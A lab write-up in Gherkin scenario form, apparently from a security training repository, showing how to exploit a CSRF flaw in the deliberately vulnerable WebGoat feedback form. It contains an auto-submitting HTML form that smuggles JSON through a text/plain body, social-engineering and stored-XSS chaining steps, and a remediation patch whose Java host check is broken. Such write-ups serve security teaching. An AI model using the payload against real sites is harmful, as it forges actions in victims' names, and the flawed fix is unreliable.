## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Category:
    Cross Site Scripting
  Location:
    /WebGoat/csrf/feedback/message - Form
  CWE:
    CWE-352: Cross-Site Request Forgery (CSRF)
  Goal:
    Post a feedback on someone else’s behalf
  Recommendation:
    Validate where requests are coming from

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running WebGoat on http://localhost

  Scenario: Normal use case
    Given I go to "WebGoat/start.mvc#lesson/CSRF.lesson/6"
    And I get a page where I can submit a review and a number of stars

  Scenario: Static detection
  No origin validation
    Given I check the code at
    """
    webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/
    CSRFFeedback.java
    """
    And I see
    """
    37  @PostMapping(value = "/message", produces = {"application/json"})
    38  @ResponseBody
    39  public AttackResult completed(HttpServletRequest request, @RequestBody S
    tring feedback) {
    40      try {
    41          objectMapper.readValue(feedback.getBytes(), Map.class);
    42      } catch (IOException e) {
    43          return failed().feedback(ExceptionUtils.getStackTrace(e)).build(

    );
    44      }
    45      boolean correctCSRF = requestContainsWebGoatCookie(request.getCookie
    s()) && request.getContentType().equals(MediaType.TEXT_PLAIN_VALUE);
    46      correctCSRF &= hostOrRefererDifferentHost(request);
    47      if (correctCSRF) {
    48          String flag = UUID.randomUUID().toString();
    49          userSessionData.setValue("csrf-feedback", flag);
    50          return success().feedback("csrf-feedback-success").feedbackArgs(
      flag).build();
    51      }
    52      return failed().build();
    53  }
    """
    Then I notice it's not checking the request origin before returning results
    Then I know it's vulnerable to CSRF

  Scenario: Dynamic detection
  Fiddling with the Host header to detect CSRF
    Given I intercept a review submission request with Burp
    """
    POST /WebGoat/csrf/feedback/message HTTP/1.1
    Host: 127.0.0.1:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8000/WebGoat/start.mvc
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Connection: close
    Cookie: JSESSIONID=61A6299D90E972C1F4AFCC58A11F4559; BEEFHOOK=sPHOtf4WZ9fRh2
    UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMczxQSjSeGdfc9De

    {"name":"WebGoat","email":"webgoat@webgoat.org","subject":"service","message
    ":"WebGoat is the best"}
    """
    Then I write a HTML page to try and CSRF the endpoint
    And try to do it by sending a JSon request via AJAX
    """
    <script>
      fetch('http://127.0.0.1:8000/WebGoat/csrf/feedback/message', {method: 'POS
      T', credentials: 'include', headers: {'Content-Type': 'application/json'},
      body: '{"name":"WebGoat","email":"webgoat@webgoat.org","subject":"service"
      ,"message":"WebGoat is the best"}'});
    </script>
    """
    But it doesn't work because of CORS protection
    """
    Solicitud de origen cruzado bloqueada: La misma política de origen no
    permite la lectura de recursos remotos en http://127.0.0.1:8000/WebGoat/csrf
    /feedback/message. (Razón: Solicitud CORS sin éxito).[Saber más]
    """
    Then I have to find another way to send the JSON data
    Then I create a new HTML page that POSTs the JSON data in a param name
    """
    <html>
    <form NAME="poc" action=http://127.0.0.1:8000/WebGoat/csrf/feedback/message
    method=post enctype="text/plain" >
    <input name='{"name":"fd","email":"fds@gmail.com","subject":"service","messa
    ge":"ffff","ignore_me":"' value='test"}'type='hidden'>
    </form>
    <script>document.poc.submit();</script>
    </html>
    """
    Then I open it in firefox and get a success message (evidence)[success.png]
    Then the server only cares for JSON formatted data but no type or origin

  Scenario: Exploitation
  Submit a feedback in another user's behalf
    Given I know the target is vulnerable to CSRF
    Given I have created a page that exploits this CSRF
    Then I upload it to my server and send the link to another user
    Then when the user clicks on it, a feedback message is sent in their name

  Scenario: Remediation
  Check the origin corresponds to the site and Content-Type
    Given I patch the code like this
    """
    37  @PostMapping(value = "/message", produces = {"application/json"})
    38  @ResponseBody
    39  public AttackResult completed(HttpServletRequest request, @RequestBody S
    tring feedback) {
    40      try {
    41          objectMapper.readValue(feedback.getBytes(), Map.class);
    42      } catch (IOException e) {
    43          return failed().feedback(ExceptionUtils.getStackTrace(e)).build(

    );
    44      }
    45      boolean correctCSRF = requestContainsWebGoatCookie(request.getCookie
    s()) && request.getContentType().equals("application/json");
    46      correctCSRF &= hostOrRefererDifferentHost(request);
    47      if (correctCSRF && request.getHost() == '127.0.0.1:8000') {
    48          String flag = UUID.randomUUID().toString();
    49          userSessionData.setValue("csrf-feedback", flag);
    50          return success().feedback("csrf-feedback-success").feedbackArgs(
      flag).build();
    51      }
    52      return failed().build();
    53  }
    """
    Then when the victim user clicks on my malicious link
    Then the fake feedback doesn't get sent

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.4/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.0/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    systems/webgoat/79-stored-xss
      Given I leave a stored xss attack that redirects to my site
      And I have my malicious CSRF hosted in my site
      Given a user goes to the comments page and see the XSS comment
      Then they'll inadvertently send a feedback message via CSRF